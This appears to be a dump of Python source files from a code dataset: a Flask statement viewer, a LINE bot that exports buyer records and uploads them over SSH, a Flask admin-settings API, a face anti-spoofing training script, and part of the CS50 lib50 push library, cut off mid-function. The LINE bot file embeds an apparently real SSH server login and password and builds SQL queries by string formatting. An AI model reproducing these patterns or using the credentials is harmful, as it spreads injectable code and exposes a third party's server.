+{"seq_id":"444059205","text":"from flask import Flask, render_template, request, redirect, session #Importa a biblioteca do microframework Flask do diretório \"flask\"\nfrom CreditoNu import Boleto #Imposta a classe \"Boleto\" do diretório \"CreditoNu\"\nboleto = 'nubank-2019-04.csv' #Especifíca o título do arquivo que será extraído\ndata = '2019-03-09' #Especifíca a data que será pesquisada\n\ncategoria1 = 'restaurante' #Especifíca a categoria 1\ncategoria2 = 'servicos' # // // // 2\ncategoria3 = 'transporte' # // // // 3\n\napp = Flask(__name__)\n\ndata = 0\nteste = 0\n\n\n@app.route('/')\ndef index():\n return render_template('inicio.html', titulo = 'Pesquisa')\n\n\n@app.route('/login')\ndef login():\n return render_template('login.html')\n\n\n@app.route('/autenticar', methods=['POST',])\ndef autenticar():\n if 'mestra' == request.form['senha']:\n #session['usuario_logado'] = request.form['usuario']\n return redirect('/')\n else:\n return redirect('/login')\n\n\n@app.route('/pesquisar', methods=['POST',])\ndef pesquisar():\n extrato = request.form['extrato']\n data = request.form['data']\n teste = Boleto(extrato) # Variável recebe a classe \"Boleto\" com a variável \"boleto\" passada como parâmentro\n return render_template('painel.html',\n data='2019-07',\n quantidade=teste.quantidadeTransacoes(),\n extrato=teste.lista,\n maiorGasto=teste.maiorGasto(),\n valorGastoTotal=teste.valorGastoTotal(),\n valorPagoTotal=teste.valorPagoTotal(),\n categoria=categoria3.capitalize(),\n valorCategoria=teste.valorTransacoesPorCategoria(categoria3),\n Data=data,\n transacoesData=teste.mostraTransacoesPorData(data))\n\n\napp.run(debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2285,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"426250362","text":"from linebot.models import *\nfrom datetime import datetime\nimport os\nimport csv\nfrom paramiko import SSHClient,AutoAddPolicy\nfrom func.scp import SCPClient\nfrom linebot import (\n LineBotApi\n)\nchannel_access_token = os.getenv('LINE_CHANNEL_ACCESS_TOKEN', None)\nline_bot_api = LineBotApi(channel_access_token)\n\ndef Excel(thing_id, userid, con) :\n db = con.cursor()\n db.execute(\"SELECT * FROM buy_list WHERE thing_id={}\".format(thing_id))\n data = db.fetchall()\n os.system(\"touch profile.csv\")\n file = open('profile.csv', 'w',encoding='utf-8-sig')\n csvCursor = csv.writer(file)\n csvCursor.writerow(['買家姓名','Line暱稱','電話','購買數量','是否出貨','購買時間'])\n for d in data :\n profile = line_bot_api.get_profile(d[3])\n db.execute(\"SELECT name,phone FROM user_list WHERE userid='{}'\".format(d[3]))\n data_2 = db.fetchone()\n if d[4]=='check' :\n status = 'yes'\n else :\n status = 'no'\n csvCursor.writerow([data_2[0],profile.display_name,data_2[1],d[2],status,d[5]])\n print ([data_2[0],profile.display_name,data_2[1],d[2],status,d[5]])\n file.close()\n server = \"cscc.hsexpert.net\"\n port = 22\n user = \"apie0419\"\n password = \"a19970419\"\n client = SSHClient()\n client.load_system_host_keys()\n client.set_missing_host_key_policy(AutoAddPolicy())\n client.connect(server, port, user, password)\n scp = SCPClient(client.get_transport())\n scp.put('profile.csv','public_html/chatbot-excels/{}.csv'.format(userid))\n scp.close()\n return TextSendMessage(text=\"stu-web.tkucs.cc/404411240/chatbot-excels/{}.csv\".format(userid))\n","sub_path":"excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"612823325","text":"#!/usr/bin/env python\n# -*-coding:utf-8-*-\n# @Time : 2017/11/1 ~ 2019/9/1\n# @Author : Allen Woo\nfrom flask import request\nfrom apps.core.flask.login_manager import osr_login_required\n\nfrom apps.configs.sys_config import METHOD_WARNING\nfrom apps.core.blueprint import api\nfrom apps.core.flask.permission import permission_required\nfrom apps.core.flask.response import response_format\n\nfrom apps.modules.setting.process.settings import sys_config_version, conf_version_switch, get_sys_configs, \\\n sys_config_edit\n\n\n@api.route('/admin/setting/sys/config/version', methods=['GET', 'PUT'])\n@osr_login_required\n@permission_required()\ndef api_sys_config_version():\n \"\"\"\n GET:\n 获取所有的系统配置版本, 和网站服务器主机\n PUT:\n 切换单个节点网站的配置版本\n switch_version:, 需要切换的版本号\n diable_update: , 0 or 1\n host_ip:, 主机ip\n\n :return:\n \"\"\"\n if request.c_method == \"GET\":\n data = sys_config_version()\n elif request.c_method == \"PUT\":\n data = conf_version_switch()\n else:\n data = {\"msg_type\": \"w\", \"msg\": METHOD_WARNING, \"custom_status\": 405}\n return response_format(data)\n\n\n@api.route('/admin/setting/sys/config', methods=['GET', 'PUT'])\n@osr_login_required\n@permission_required()\ndef api_sys_config():\n \"\"\"\n GET:\n 根据project获取当前最新配置(特殊配置将不会返回,如不允许再页面编辑的,即那些不带有\"__restart__\"key的)\n project:, 能同时获取多个project的数据.不使用此参数则表示获取全部配置\n keyword:, 搜索匹配关键字的结构\n only_project_field:, 只需要project字段. 0 or 1.默认为0\n PUT:\n key:, 要设置的配制参数的key\n project:, 项目,比如这个key是comment下的,则project为comment\n value:, key对应的值\n info:, 说明\n\n :return:\n \"\"\"\n if request.c_method == \"GET\":\n data = get_sys_configs()\n elif request.c_method == \"PUT\":\n data = sys_config_edit()\n else:\n data = {\"msg_type\": \"w\", \"msg\": METHOD_WARNING, \"custom_status\": 405}\n return response_format(data)\n","sub_path":"apps/modules/setting/apis/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":2271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"190801833","text":"import os\r\nimport numpy as np\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torchvision.transforms as transforms\r\nfrom model.model import Spoofing\r\nfrom model.model import Classifier\r\nfrom dataset import faceDataset\r\nfrom loss import TripletLoss\r\nfrom torch.autograd import Variable\r\nfrom torch.utils.data import DataLoader\r\nfrom sklearn.metrics import roc_auc_score\r\nfrom model.network import ResnetUnetHybrid\r\n \r\nif __name__ == '__main__':\r\n \r\n torch.manual_seed(1234)\r\n torch.cuda.manual_seed(1234)\r\n device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')\r\n \r\n # Read data from numpy file\r\n train_data = np.load('train_data.npy')\r\n train_label = np.load('train_label.npy')\r\n train_dataset = faceDataset('oulu_train', './oulu/train', data=train_data, label=train_label)\r\n print(train_data.shape)\r\n val_data = np.load('val_data.npy')\r\n val_label = np.load('val_label.npy')\r\n val_dataset = faceDataset('oulu_train', './oulu/val', data=val_data, label=val_label, sequence=True)\r\n print(val_data.shape)\r\n batch_size = 16\r\n train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\r\n val_loader = DataLoader(val_dataset, batch_size=1, shuffle=False)\r\n\r\n model = Spoofing(in_channels=4).cuda()\r\n classifier = Classifier(pretrained=True).cuda()\r\n depth_generator = ResnetUnetHybrid.load_pretrained(device = device)\r\n\r\n lr = 1e-4\r\n optimizer = torch.optim.Adam(model.parameters(), lr=lr)\r\n optimizer_classifier = torch.optim.Adam(classifier.parameters(), lr=lr)\r\n \r\n decay_rate = 0.95\r\n lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, 1, gamma=decay_rate)\r\n lr_scheduler_classifier = torch.optim.lr_scheduler.StepLR(optimizer_classifier, 1, gamma=decay_rate)\r\n \r\n triplet_loss = TripletLoss()\r\n bce_loss_cuda = nn.BCEWithLogitsLoss(pos_weight=torch.tensor([4]).cuda())\r\n bce_loss = nn.BCEWithLogitsLoss(pos_weight=torch.tensor([4]))\r\n MSE_loss = nn.MSELoss()\r\n normal_bce = nn.BCEWithLogitsLoss()\r\n \r\n num_epoch = 40\r\n best_val_auc = 0\r\n best_loss = 9999\r\n \r\n print('Start train')\r\n depth_generator.eval()\r\n for epoch in range(num_epoch):\r\n model.train()\r\n classifier.train()\r\n train_loss = 0\r\n\r\n for i, (data, label) in enumerate(train_loader):\r\n optimizer.zero_grad()\r\n optimizer_classifier.zero_grad()\r\n # data : [batch, 3, size, size]\r\n # label : [batch, 1]\r\n # cue_output, score = model(data.cuda())\r\n depth_map = depth_generator(data.cuda() * label.view(-1, 1, 1, 1).cuda())\r\n depth_map = F.interpolate(depth_map, size=(224, 224), mode='bicubic', align_corners=False)\r\n # RGBD_data = torch.cat((data.cuda(), depth_map), 1)\r\n cue_output, score = model(data.cuda())\r\n \r\n # binary loss \r\n classifier_loss = bce_loss_cuda(score, label.cuda())\r\n # classifier_loss = cross_loss(score, label.view(-1).long().cuda())\r\n\r\n # cue_map loss (L2_loss)\r\n # cup_output[-1] shape: [batch, 1, size, size]\r\n\r\n # cue_map = cue_output[-1] * label.view(-1, 1, 1, 1).cuda()\r\n # live_num = torch.sum(label)\r\n # reg_loss = torch.sum(torch.abs(cue_map)) / (live_num + 1e-9)\r\n reg_loss = MSE_loss(cue_output[-1], depth_map)\r\n\r\n # Triplet loss\r\n trip_loss = 0\r\n for feat in cue_output[:-1]:\r\n feat = F.adaptive_avg_pool2d(feat, [1, 1]).view(cue_output[-1].shape[0], -1)\r\n trip_loss += triplet_loss(feat, label.view(-1, 1).cuda())\r\n\r\n total_loss = 1*classifier_loss + 2*reg_loss + 
1*trip_loss\r\n total_loss.backward()\r\n optimizer.step()\r\n optimizer_classifier.step()\r\n train_loss += total_loss.item()\r\n print('\\r[{}/{}] {}/{} train_loss: {:9.5f}'.format( \\\r\n epoch+1, num_epoch, i+1, len(train_loader), train_loss/(i+1)), end='')\r\n\r\n torch.cuda.empty_cache()\r\n lr_scheduler.step()\r\n lr_scheduler_classifier.step()\r\n\r\n # Validation\r\n cue_threshold = 0.01\r\n model.eval()\r\n classifier.eval()\r\n with torch.no_grad():\r\n output = np.zeros(1)\r\n valid_loss = 0\r\n for i, (data, label) in enumerate(val_loader):\r\n batch = data.shape[0]\r\n data = data.view(-1, 3, val_dataset.new_size, val_dataset.new_size)\r\n # depth_map = depth_generator(data.cuda())\r\n # depth_map = F.interpolate(depth_map, size=(224, 224), mode='bicubic', align_corners=False)\r\n # RGBD_data = torch.cat((data.cuda(), depth_map), 1)\r\n output_cue, score = model(data.cuda())\r\n # score = classifier(model.encoder(output_cue[-1].detach() + data.cuda())[-1])\r\n\r\n # for cross entropy\r\n # score = torch.softmax(score, dim=1)\r\n # max_score = torch.max(score, dim=1)[0]\r\n # index = torch.max(score, dim=1)[1]\r\n # max_score[index == 0] = -max_score[index == 0] + 1\r\n # score = max_score.cpu().numpy().reshape(batch, 11)\r\n # output = np.concatenate((output, np.mean(score, axis=1)))\r\n\r\n score = torch.sigmoid(score)\r\n\r\n # non_zero = (output_cue != 0)\r\n # score = score.cpu().numpy().reshape(batch, 11)\r\n # output = np.concatenate((output, np.sum(output_cue * score, axis=1) / non_zero.sum(axis=1)))\r\n score = score.cpu().numpy().reshape(batch, 11)\r\n output = np.concatenate((output, np.mean(score, axis=1)))\r\n output = output[1:]\r\n groundtruth = np.mean(val_label, axis=1).astype(np.uint8)\r\n valid_loss = bce_loss(torch.Tensor(output), torch.Tensor(groundtruth)).item()\r\n valid_auc = roc_auc_score(groundtruth, output)\r\n print('\\nAUC socre: {} Classifier loss: {}'.format(valid_auc, valid_loss))\r\n if valid_loss < best_loss and epoch > 10:\r\n best_loss = valid_loss\r\n torch.save(model.state_dict(), 'spoofer.pth')\r\n print('Save model !')\r\n # torch.save(classifier.state_dict(), 'classifier.pth')\r\n torch.cuda.empty_cache()\r\n\r\n\r\n","sub_path":"train_RGBD.py","file_name":"train_RGBD.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"173634922","text":"import collections\nimport contextlib\nimport copy\nimport datetime\nimport fnmatch\nimport gettext\nimport glob\nimport itertools\nimport logging\nimport os\nfrom pathlib import Path\nimport pkg_resources\nimport re\nimport shutil\nimport shlex\nimport subprocess\nimport sys\nimport tempfile\nimport threading\nimport termios\nimport time\nimport tty\nimport functools\n\nimport attr\nimport jellyfish\nimport pexpect\nimport requests\nimport termcolor\nimport yaml\n\nfrom . import _, get_local_path\nfrom ._errors import *\nfrom . import config as lib50_config\n\n__all__ = [\"push\", \"local\", \"working_area\", \"files\", \"connect\",\n \"prepare\", \"authenticate\", \"upload\", \"logout\", \"ProgressBar\",\n \"fetch_config\", \"get_local_slugs\", \"check_github_status\", \"Slug\", \"cd\"]\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\n_CREDENTIAL_SOCKET = Path(\"~/.git-credential-cache/lib50\").expanduser()\nDEFAULT_PUSH_ORG = \"me50\"\nAUTH_URL = \"https://submit.cs50.io\"\n\n\ndef push(tool, slug, config_loader, repo=None, data=None, prompt=lambda included, excluded: True):\n \"\"\"\n Push to github.com/org/repo=username/slug if tool exists.\n Returns username, commit hash\n \"\"\"\n\n if data is None:\n data = {}\n\n language = os.environ.get(\"LANGUAGE\")\n if language:\n data.setdefault(\"lang\", language)\n\n slug = Slug.normalize_case(slug)\n\n check_dependencies()\n\n # Connect to GitHub and parse the config files\n org, (included, excluded), message = connect(slug, config_loader)\n\n # Authenticate the user with GitHub, and prepare the submission\n with authenticate(org, repo=repo) as user, prepare(tool, slug, user, included):\n\n # Show any prompt if specified\n if prompt(included, excluded):\n username, commit_hash = upload(slug, user, tool, data)\n return username, commit_hash, message.format(username=username, slug=slug, commit_hash=commit_hash)\n else:\n raise Error(_(\"No files were submitted.\"))\n\n\ndef local(slug, offline=False):\n \"\"\"\n Create/update local copy of github.com/org/repo/branch.\n Returns path to local copy\n \"\"\"\n\n # Parse slug\n slug = Slug(slug, offline=offline)\n\n local_path = get_local_path() / slug.org / slug.repo\n\n git = Git().set(\"-C {path}\", path=str(local_path))\n if not local_path.exists():\n _run(Git()(\"init {path}\", path=str(local_path)))\n _run(git(f\"remote add origin https://github.com/{slug.org}/{slug.repo}\"))\n\n if not offline:\n # Get latest version of checks\n _run(git(\"fetch origin {branch}\", branch=slug.branch))\n\n # Ensure that local copy of the repo is identical to remote copy\n _run(git(\"checkout -f -B {branch} origin/{branch}\", branch=slug.branch))\n _run(git(\"reset --hard HEAD\"))\n\n problem_path = (local_path / slug.problem).absolute()\n\n if not problem_path.exists():\n raise InvalidSlugError(_(\"{} does not exist at {}/{}\").format(slug.problem, slug.org, slug.repo))\n\n return problem_path\n\n\n@contextlib.contextmanager\ndef working_area(files, name=\"\"):\n \"\"\"\n Copy all files to a temporary directory (the working area)\n Optionally names the working area name\n Returns path to the working area\n \"\"\"\n with tempfile.TemporaryDirectory() as dir:\n dir = Path(Path(dir) / name)\n dir.mkdir(exist_ok=True)\n\n for f in files:\n dest = (dir / f).absolute()\n dest.parent.mkdir(parents=True, exist_ok=True)\n shutil.copy(f, dest)\n yield dir\n\n\n@contextlib.contextmanager\ndef cd(dest):\n \"\"\" Temporarily cd into a directory\"\"\"\n 
origin = os.getcwd()\n try:\n os.chdir(dest)\n yield dest\n finally:\n os.chdir(origin)\n\n\ndef files(patterns,\n require_tags=(\"require\",),\n include_tags=(\"include\",),\n exclude_tags=(\"exclude\",),\n root=\".\"):\n \"\"\"\n Takes a list of lib50._config.TaggedValue and returns which files should be included and excluded from `root`.\n Any pattern tagged with a tag\n from include_tags will be included\n from require_tags can only be a file, that will then be included. MissingFilesError is raised if missing\n from exclude_tags will be excluded\n Any pattern in always_exclude will always be excluded.\n \"\"\"\n require_tags = list(require_tags)\n include_tags = list(include_tags)\n exclude_tags = list(exclude_tags)\n\n # Ensure tags do not start with !\n for tags in [require_tags, include_tags, exclude_tags]:\n for i, tag in enumerate(tags):\n tags[i] = tag[1:] if tag.startswith(\"!\") else tag\n\n with cd(root):\n # Include everything but hidden paths by default\n included = _glob(\"*\")\n excluded = set()\n\n if patterns:\n missing_files = []\n\n # For each pattern\n for pattern in patterns:\n # Include all files that are tagged with !require\n if pattern.tag in require_tags:\n file = str(Path(pattern.value))\n if not Path(file).exists():\n missing_files.append(file)\n else:\n try:\n excluded.remove(file)\n except KeyError:\n pass\n else:\n included.add(file)\n # Include all files that are tagged with !include\n elif pattern.tag in include_tags:\n new_included = _glob(pattern.value)\n excluded -= new_included\n included.update(new_included)\n # Exclude all files that are tagged with !exclude\n elif pattern.tag in exclude_tags:\n new_excluded = _glob(pattern.value)\n included -= new_excluded\n excluded.update(new_excluded)\n\n if missing_files:\n raise MissingFilesError(missing_files)\n\n # Exclude any files that are not valid utf8\n invalid = set()\n for file in included:\n try:\n file.encode(\"utf8\")\n except UnicodeEncodeError:\n excluded.add(file.encode(\"utf8\", \"replace\").decode())\n invalid.add(file)\n included -= invalid\n\n return included, excluded\n\n\ndef connect(slug, config_loader):\n \"\"\"\n Ensure .cs50.yaml and tool key exist, raises Error otherwise\n Check that all required files as per .cs50.yaml are present\n Returns org, and a tuple of included and excluded files\n \"\"\"\n with ProgressBar(_(\"Connecting\")):\n # Get the config from GitHub at slug\n config_yaml = fetch_config(slug)\n\n # Load config file\n try:\n config = config_loader.load(config_yaml)\n except MissingToolError:\n raise InvalidSlugError(_(\"Invalid slug for {}. Did you mean something else?\").format(config_loader.tool))\n\n # If config of tool is just a truthy value, config should be empty\n if not isinstance(config, dict):\n config = {}\n\n # By default send check50/style50 results back to submit.cs50.io\n remote = {\n \"org\": DEFAULT_PUSH_ORG,\n \"message\": \"Go to https://submit.cs50.io/users/{username}/{slug} to see your results.\",\n \"callback\": \"https://submit.cs50.io/hooks/results\"\n }\n\n remote.update(config.get(\"remote\", {}))\n\n # Figure out which files to include and exclude\n included, excluded = files(config.get(\"files\"))\n\n # Check that at least 1 file is staged\n if not included:\n raise Error(_(\"No files in this directory are expected for submission.\"))\n\n return remote[\"org\"], (included, excluded), remote[\"message\"]\n\n\n@contextlib.contextmanager\ndef authenticate(org, repo=None):\n \"\"\"\n Authenticate with GitHub via SSH if possible\n Otherwise authenticate via HTTPS\n Returns an authenticated User\n \"\"\"\n with ProgressBar(_(\"Authenticating\")) as progress_bar:\n user = _authenticate_ssh(org, repo=repo)\n progress_bar.stop()\n if user is None:\n # SSH auth failed, fall back to HTTPS\n with _authenticate_https(org, repo=repo) as user:\n yield user\n else:\n yield user\n\n\n@contextlib.contextmanager\ndef prepare(tool, branch, user, included):\n \"\"\"\n Prepare git for pushing\n Check that there are no permission errors\n Add necessities to git config\n Stage files\n Stage files via lfs if necessary\n Check that at least one file is staged\n \"\"\"\n with ProgressBar(_(\"Preparing\")) as progress_bar, working_area(included) as area:\n Git.working_area = f\"-C {shlex.quote(str(area))}\"\n git = Git().set(Git.working_area)\n # Clone just .git folder\n try:\n _run(git.set(Git.cache)(\"clone --bare {repo} .git\", repo=user.repo))\n except Error:\n msg = _(\"Looks like {} isn't enabled for your account yet. 
\").format(tool)\n if user.org != DEFAULT_PUSH_ORG:\n msg += _(\"Please contact your instructor about this issue.\")\n else:\n msg += _(\"Please go to {} in your web browser and try again.\").format(AUTH_URL)\n\n raise Error(msg)\n\n _run(git(\"config --bool core.bare false\"))\n _run(git(\"config --path core.worktree {area}\", area=str(area)))\n\n try:\n _run(git(\"checkout --force {branch} .gitattributes\", branch=branch))\n except Error:\n pass\n\n # Set user name/email in repo config\n _run(git(\"config user.email {email}\", email=user.email))\n _run(git(\"config user.name {name}\", name=user.name))\n\n # Switch to branch without checkout\n _run(git(\"symbolic-ref HEAD {ref}\", ref=f\"refs/heads/{branch}\"))\n\n # Git add all included files\n _run(git(f\"add -f {' '.join(shlex.quote(f) for f in included)}\"))\n\n # Remove gitattributes from included\n if Path(\".gitattributes\").exists() and \".gitattributes\" in included:\n included.remove(\".gitattributes\")\n\n # Add any oversized files through git-lfs\n _lfs_add(included, git)\n\n progress_bar.stop()\n yield\n\n\ndef upload(branch, user, tool, data):\n \"\"\"\n Commit + push to branch\n Returns username, commit hash\n \"\"\"\n\n with ProgressBar(_(\"Uploading\")):\n commit_message = _(\"automated commit by {}\").format(tool)\n\n data_str = \" \".join(f\"[{key}={val}]\" for key, val in data.items())\n\n commit_message = f\"{commit_message} {data_str}\"\n\n # Commit + push\n git = Git().set(Git.working_area)\n _run(git(\"commit -m {msg} --allow-empty\", msg=commit_message))\n _run(git.set(Git.cache)(\"push origin {branch}\", branch=branch))\n commit_hash = _run(git(\"rev-parse HEAD\"))\n return user.name, commit_hash\n\n\ndef fetch_config(slug):\n \"\"\"\n Fetch the config file at slug from GitHub.\n Returns the unparsed json as a string.\n Raises InvalidSlugError if there is no config file at slug.\n \"\"\"\n # Parse slug\n slug = Slug(slug)\n\n # Get config file (.cs50.yaml)\n try:\n yaml_content = get_content(slug.org, slug.repo, slug.branch, slug.problem / \".cs50.yaml\")\n except InvalidSlugError:\n yaml_content = None\n\n # Get config file (.cs50.yml)\n try:\n yml_content = get_content(slug.org, slug.repo, slug.branch, slug.problem / \".cs50.yml\")\n except InvalidSlugError:\n yml_content = None\n\n # If neither exists, error\n if not yml_content and not yaml_content:\n # Check if GitHub outage may be the source of the issue\n check_github_status()\n\n # Otherwise raise an InvalidSlugError\n raise InvalidSlugError(_(\"Invalid slug: {}. Did you mean something else?\").format(slug))\n\n # If both exists, error\n if yml_content and yaml_content:\n raise InvalidSlugError(_(\"Invalid slug: {}. 
Multiple configurations (both .yaml and .yml) found.\").format(slug))\n\n return yml_content or yaml_content\n\n\ndef get_local_slugs(tool, similar_to=\"\"):\n \"\"\"\n Get all slugs for tool of lib50 has a local copy.\n If similar_to is given, ranks local slugs by similarity to similar_to.\n \"\"\"\n # Extract org and repo from slug to limit search\n similar_to = similar_to.strip(\"/\")\n parts = Path(similar_to).parts\n entered_org = parts[0] if len(parts) >= 1 else \"\"\n entered_repo = parts[1] if len(parts) >= 2 else \"\"\n\n # Find path of local repo's\n local_path = get_local_path()\n local_repo = local_path / entered_org / entered_repo\n\n if not local_repo.exists():\n local_repo = local_path\n\n # Find all local config files within local_path\n config_paths = []\n for root, dirs, files in os.walk(local_repo):\n try:\n config_paths.append(lib50_config.get_config_filepath(root))\n except Error:\n pass\n\n # Filter out all local config files that do not contain tool\n config_loader = lib50_config.Loader(tool)\n valid_paths = []\n for config_path in config_paths:\n with open(config_path) as f:\n if config_loader.load(f.read(), validate=False):\n valid_paths.append(config_path.relative_to(local_path))\n\n # Find branch for every repo\n branch_map = {}\n for path in valid_paths:\n org, repo = path.parts[0:2]\n if (org, repo) not in branch_map:\n git = Git().set(\"-C {path}\", path=str(local_path / path.parent))\n branch = _run(git(\"rev-parse --abbrev-ref HEAD\"))\n branch_map[(org, repo)] = branch\n\n # Reconstruct slugs for each config file\n slugs = []\n for path in valid_paths:\n org, repo = path.parts[0:2]\n branch = branch_map[(org, repo)]\n problem = \"/\".join(path.parts[2:-1])\n slugs.append(\"/\".join((org, repo, branch, problem)))\n\n return _rank_similar_slugs(similar_to, slugs) if similar_to else slugs\n\n\ndef _rank_similar_slugs(target_slug, other_slugs):\n \"\"\"\n Rank other_slugs by their similarity to target_slug.\n Returns a list of other_slugs in order (most similar -> least similar).\n \"\"\"\n if len(Path(target_slug).parts) >= 2:\n other_slugs_filtered = [slug for slug in other_slugs if Path(slug).parts[0:2] == Path(target_slug).parts[0:2]]\n if other_slugs_filtered:\n other_slugs = other_slugs_filtered\n\n scores = {}\n for other_slug in other_slugs:\n scores[other_slug] = jellyfish.jaro_winkler(target_slug, other_slug)\n\n return sorted(scores, key=lambda k: scores[k], reverse=True)\n\n\ndef check_dependencies():\n \"\"\"\n Check that dependencies are installed:\n - require git 2.7+, so that credential-cache--daemon ignores SIGHUP\n https://github.com/git/git/blob/v2.7.0/credential-cache--daemon.c\n \"\"\"\n\n # Check that git is installed\n if not shutil.which(\"git\"):\n raise Error(_(\"You don't have git. Install git, then re-run!\"))\n\n # Check that git --version > 2.7\n version = subprocess.check_output([\"git\", \"--version\"]).decode(\"utf-8\")\n matches = re.search(r\"^git version (\\d+\\.\\d+\\.\\d+).*$\", version)\n if not matches or pkg_resources.parse_version(matches.group(1)) < pkg_resources.parse_version(\"2.7.0\"):\n raise Error(_(\"You have an old version of git. 
Install version 2.7 or later, then re-run!\"))\n\n\ndef logout():\n _run(f\"git credential-cache --socket {_CREDENTIAL_SOCKET} exit\")\n\n\n@attr.s(slots=True)\nclass User:\n name = attr.ib()\n repo = attr.ib()\n org = attr.ib()\n email = attr.ib(default=attr.Factory(lambda self: f\"{self.name}@users.noreply.github.com\",\n takes_self=True),\n init=False)\n\n\nclass Git:\n cache = \"\"\n working_area = \"\"\n\n def __init__(self):\n self._args = []\n\n def set(self, git_arg, **format_args):\n \"\"\"git = Git().set(\"-C {folder}\", folder=\"foo\")\"\"\"\n format_args = {name: shlex.quote(arg) for name, arg in format_args.items()}\n git = Git()\n git._args = self._args[:]\n git._args.append(git_arg.format(**format_args))\n return git\n\n def __call__(self, command, **format_args):\n \"\"\"Git()(\"git clone {repo}\", repo=\"foo\")\"\"\"\n git = self.set(command, **format_args)\n\n git_command = f\"git {' '.join(git._args)}\"\n git_command = re.sub(' +', ' ', git_command)\n\n # Format to show in git info\n logged_command = git_command\n for opt in [Git.cache, Git.working_area]:\n logged_command = logged_command.replace(str(opt), \"\")\n logged_command = re.sub(' +', ' ', logged_command)\n\n # Log pretty command in info\n logger.info(termcolor.colored(logged_command, attrs=[\"bold\"]))\n\n return git_command\n\n\nclass Slug:\n def __init__(self, slug, offline=False):\n \"\"\"Parse /// from slug.\"\"\"\n self.slug = self.normalize_case(slug)\n self.offline = offline\n\n # Assert begin/end of slug are correct\n self._check_endings()\n\n # Find third \"/\" in identifier\n idx = self.slug.find(\"/\", self.slug.find(\"/\") + 1)\n if idx == -1:\n raise InvalidSlugError(_(\"Invalid slug\"))\n\n # Split slug in //\n remainder = self.slug[idx + 1:]\n self.org, self.repo = self.slug.split(\"/\")[:2]\n\n # Gather all branches\n try:\n branches = self._get_branches()\n except TimeoutError:\n if not offline:\n raise ConnectionError(\"Could not connect to GitHub, it seems you are offline.\")\n branches = []\n except Error:\n branches = []\n\n # Find a matching branch\n for branch in branches:\n if remainder.startswith(f\"{branch}\"):\n self.branch = branch\n self.problem = Path(remainder[len(branch) + 1:])\n break\n else:\n raise InvalidSlugError(_(\"Invalid slug: {}\".format(self.slug)))\n\n def _check_endings(self):\n \"\"\"Check begin/end of slug, raises Error if malformed.\"\"\"\n if self.slug.startswith(\"/\") and self.slug.endswith(\"/\"):\n raise InvalidSlugError(\n _(\"Invalid slug. Did you mean {}, without the leading and trailing slashes?\".format(self.slug.strip(\"/\"))))\n elif self.slug.startswith(\"/\"):\n raise InvalidSlugError(\n _(\"Invalid slug. Did you mean {}, without the leading slash?\".format(self.slug.strip(\"/\"))))\n elif self.slug.endswith(\"/\"):\n raise InvalidSlugError(\n _(\"Invalid slug. 
Did you mean {}, without the trailing slash?\".format(self.slug.strip(\"/\"))))\n\n def _get_branches(self):\n \"\"\"Get branches from org/repo.\"\"\"\n if self.offline:\n local_path = get_local_path() / self.org / self.repo\n output = _run(f\"git -C {shlex.quote(str(local_path))} show-ref --heads\").split(\"\\n\")\n else:\n cmd = f\"git ls-remote --heads https://github.com/{self.org}/{self.repo}\"\n try:\n with _spawn(cmd, timeout=3) as child:\n output = child.read().strip().split(\"\\r\\n\")\n except pexpect.TIMEOUT:\n if \"Username for\" in child.buffer:\n return []\n else:\n raise TimeoutError(3)\n\n # Parse get_refs output for the actual branch names\n return (line.split()[1].replace(\"refs/heads/\", \"\") for line in output)\n\n @staticmethod\n def normalize_case(slug):\n parts = slug.split(\"/\")\n if len(parts) < 3:\n raise InvalidSlugError(_(\"Invalid slug\"))\n parts[0] = parts[0].lower()\n parts[1] = parts[1].lower()\n return \"/\".join(parts)\n\n\n def __str__(self):\n return self.slug\n\n\nclass ProgressBar:\n \"\"\"Show a progress bar starting with message.\"\"\"\n DISABLED = False\n TICKS_PER_SECOND = 2\n\n def __init__(self, message, output_stream=None):\n\n if output_stream is None:\n output_stream = sys.stderr\n\n self._message = message\n self._progressing = False\n self._thread = None\n self._print = functools.partial(print, file=output_stream)\n\n def stop(self):\n \"\"\"Stop the progress bar.\"\"\"\n if self._progressing:\n self._progressing = False\n self._thread.join()\n\n def __enter__(self):\n def progress_runner():\n self._print(f\"{self._message}...\", end=\"\", flush=True)\n while self._progressing:\n self._print(\".\", end=\"\", flush=True)\n time.sleep(1 / ProgressBar.TICKS_PER_SECOND if ProgressBar.TICKS_PER_SECOND else 0)\n self._print()\n\n if not ProgressBar.DISABLED:\n self._progressing = True\n self._thread = threading.Thread(target=progress_runner)\n self._thread.start()\n else:\n self._print(f\"{self._message}...\")\n\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n self.stop()\n\n\nclass _StreamToLogger:\n \"\"\"Send all that enters the stream to log-function.\"\"\"\n\n def __init__(self, log):\n self._log = log\n\n def write(self, message):\n message = message.strip()\n if message:\n self._log(message)\n\n def flush(self):\n pass\n\n\n@contextlib.contextmanager\ndef _spawn(command, quiet=False, timeout=None):\n # Spawn command\n child = pexpect.spawn(\n command,\n encoding=\"utf-8\",\n env=dict(os.environ),\n timeout=timeout)\n\n try:\n if not quiet:\n # Log command output to logger\n child.logfile_read = _StreamToLogger(logger.debug)\n yield child\n except BaseException:\n child.close()\n raise\n else:\n if child.isalive():\n try:\n child.expect(pexpect.EOF, timeout=timeout)\n except pexpect.TIMEOUT:\n raise Error()\n child.close(force=True)\n if child.signalstatus is None and child.exitstatus != 0:\n logger.debug(\"{} exited with {}\".format(command, child.exitstatus))\n raise Error()\n\n\ndef _run(command, quiet=False, timeout=None):\n \"\"\"Run a command, returns command output.\"\"\"\n try:\n with _spawn(command, quiet, timeout) as child:\n command_output = child.read().strip().replace(\"\\r\\n\", \"\\n\")\n except 